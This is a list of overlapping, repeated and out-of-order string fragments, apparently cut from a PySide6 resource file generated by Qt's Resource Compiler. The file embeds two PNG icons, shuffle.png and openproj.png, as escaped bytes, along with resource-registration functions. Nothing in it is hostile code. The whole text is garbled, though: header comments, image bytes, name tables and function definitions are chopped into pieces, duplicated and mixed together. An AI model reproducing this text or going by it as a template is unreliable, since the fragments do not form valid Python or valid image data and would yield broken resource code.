\\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\",
"for Qt version 6.2.2 # WARNING! All changes made in this file will",
"(j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\",
"\\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\",
"n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\",
",$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\",
"\\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\",
"\\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\",
"[\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\",
"\\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\",
"Qt version 6.2.2 # WARNING! All changes made in this file will be",
"\\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\",
"\\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\",
"from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe",
"b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\",
"Resource object code (Python 3) # Created by: object code # Created by:",
"G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\",
"\\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\",
";\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\",
"\\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\",
"\\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\",
"Resource Compiler for Qt version 6.2.2 # WARNING! All changes made in this",
"# Created by: The Resource Compiler for Qt version 6.2.2 # WARNING! All",
"\\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\",
"\\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct",
"\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\",
"\\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\",
"`\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\",
"def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()",
"\\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03,",
"\" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)",
"\\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\",
"file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\",
"A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\",
"\\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\",
"\\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\",
"\\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct =",
"All changes made in this file will be lost! from PySide6 import QtCore",
